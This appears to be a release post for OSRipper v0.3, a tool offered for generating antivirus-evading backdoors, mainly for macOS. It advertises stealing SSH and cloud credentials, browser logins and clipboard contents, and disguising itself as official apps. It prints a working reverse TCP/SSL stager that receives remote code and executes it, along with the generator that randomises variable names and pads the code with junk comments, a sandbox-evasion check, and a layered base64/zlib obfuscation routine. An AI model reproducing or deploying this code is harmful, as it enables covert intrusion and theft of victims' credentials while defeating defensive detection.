OSRipper v0.3 releases: AV evading OSX Backdoor and Crypter Framework
OSRipper
OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now, there is no support for it and it IS NOT FUD for windows (yet at least), and for now, I will not focus on windows.
Features
- FUD (for macOS)
- Cloacks as an official app (Microsoft, ExpressVPN, etc)
- Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users, etc. (more on Cedric Owens swiftbelt)
- Encrypted communications
- Rootkit-like Behaviour
- Every Backdoor generated is entirely unique
For the purpose of this tutorial, we will assume the user is generating a reverse_tcp_ssl backdoor. This is a python meterpreter that is seen as the standart. For this reason, this code flags up on every VT.
import zlib,base64,ssl,socket,struct,time
for x in range(10):
try:
so=socket.socket(2,1)
so.connect((hototo,port))
s=ssl.wrap_socket(so)
break
except:
time.sleep(10)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})
OSRipper uses this Code but makes it FUD. Our first step is critical in ensuring the uniqueness of the Backdoor. This is important because that way Antiviruses can not detect this with conventional methods.
Randomising
Before showing the randomised code I would like to show the process of randomising it.
## RandomVariables
nonce1=secrets.randbelow(14)
nonce2=secrets.randbelow(14)
UltimateRandomNumberhigh = random.randint(15,30)
UltimateRandomNumberlow=secrets.randbelow(nonce1)
UltimateRandomNumberhigh2 = random.randint(15,30)
UltimateRandomNumberlow2=secrets.randbelow(nonce2)
sleeptime = secrets.randbelow(12)
VariableRange = random.randint(8,22)
VariableRange2 = random.randint(8,22)
VariableRange3 = random.randint(8,22)
RandomisationNum = random.randint(UltimateRandomNumberlow,UltimateRandomNumberhigh)
RandomisationNum2 = random.randint(UltimateRandomNumberlow2,UltimateRandomNumberhigh2)
c=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange))))
d=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange2))))
so=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange))))
s=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange2))))
l=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange3))))
dr=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase) for i in range(int(VariableRange3))))
## jesus christ that was a LOT of random variables (and there are even more hidden away)
Now all of these have a purpose. They randomize variables, ranges of useless bloating code, the size structure of the backdoor and even other random numbers and/or strings (Yes the code is so random that the amount of randomness is random) ##Excuse my humour.
Now this is the template which the variables are put into:
for i in range(int(RandomisationNum)):
a=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase + string.punctuation)for i in range(int(random.randint(0,17)))))
ina.write('#'+a+'\n')
b = '''
from sandboxed import is_sandboxed
import sys
certainty = is_sandboxed(logging=False)
if int(certainty)>0.5:
sys.exit()
import zlib,base64,ssl,socket,struct,time
'''
ina.write(b)
for i in range(int(RandomisationNum2)):
b3=(''.join(secrets.choice(string.ascii_uppercase + string.ascii_lowercase + string.punctuation)for i in range(int(random.randint(0,7)))))
ina.write('#'+b3+'\n')
b2 = '''
for x in range(10):
try:
'''+so+'''=socket.socket(2,1)
'''+so+'''.connect(('''+c+''','''+d+'''))
'''+s+'''=ssl.wrap_socket('''+so+''')
break
except:
time.sleep('''+str(sleeptime)+''')
'''+l+'''=struct.unpack('>I','''+s+'''.recv(4))[0]
'''+dr+'''='''+s+'''.recv('''+l+''')
while len('''+dr+''')<'''+l+''':
'''+dr+'''+='''+s+'''.recv('''+l+'''-len('''+dr+'''))
exec(zlib.decompress(base64.b64decode('''+dr+''')),{'s':'''+s+'''})
'''
ina.write(b2)
Our backdoor would look like this now:
(Note: This is just an example. The chance of your Backdoor looking like this is so low that it is practically 0)
oFoEeCBkuGbMb = 3131
TUnfjZTKed = "localhost"
#QjX
#U[Dz^x.X
#AAuuTFS|H_)ff#
#Y/RIOMJ!TQE(_pAa
#{-hnk
#>PQd&HAs\GHnel
#p.u
#yv]{a[H
#VJp-@x'rw>Ij|
#-MNuTM)u~dVP(=
#NjM/
#Z,Qfe
#m!wPXuiq'q=:`
#'`V
#+?FR!CCeDYX&X
#;E:BanP:l\.{h>j-f
#:Z~
#{MvUxf\[v)QcZP
#s)r*
from sandboxed import is_sandboxed
import sys
certainty = is_sandboxed(logging=False)
if int(certainty)>0.5:
sys.exit()
import zlib,base64,ssl,socket,struct,time
#SF
#IdBUl
#?|'D~e_
#<eGx
#:/+n.zu
#!ELYc
#n^;pe-J
#+
#j
#mj\
#-Ep'k
#k>h
#)]+&;
#
#EH#:
#x`Lpqo
#XX
#@R;
#
#)Jw-br
#jL@|CT
#
#'n+PV'd
for x in range(10):
try:
XhtdBOXRbZ=socket.socket(2,1)
XhtdBOXRbZ.connect((TUnfjZTKed,oFoEeCBkuGbMb))
WEzmuVHZePcTZ=ssl.wrap_socket(XhtdBOXRbZ)
break
except:
time.sleep(10)
rkADKrpRQeEPQqdPzrx=struct.unpack('>I',WEzmuVHZePcTZ.recv(4))[0]
byhBYCrScioOzxZowuO=WEzmuVHZePcTZ.recv(rkADKrpRQeEPQqdPzrx)
while len(byhBYCrScioOzxZowuO)<rkADKrpRQeEPQqdPzrx:
byhBYCrScioOzxZowuO+=WEzmuVHZePcTZ.recv(rkADKrpRQeEPQqdPzrx-len(byhBYCrScioOzxZowuO))
exec(zlib.decompress(base64.b64decode(byhBYCrScioOzxZowuO)),{'s':WEzmuVHZePcTZ})
Now we can start with the Obfuscation
Obfuscation
The obfuscation works like this. First, the code is encoded in base64. Then the base64 string is compressed by zlib. Doing only this helps with preventing AV detection but however, OSRipper does this multiple hundred times (again the integer is chosen randomly)
_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'='))
Changelog v0.3
The payloads will now be double staged in order to evade av detection. Please keep in mind that i develop on arch and only test on a few platforms so there are sure to be bugs and you should open issues for them. Biggest difference to last release is that this project isnt focused on macOS anymore but on all platforms. It also now features a web server on which the staged payload is stored. I will develop this server into a C2 to which data will be pushed from the victim. With this update the developtment is officially back in progress.
Install & Use
Copyright (c) 2022 SubGlitch1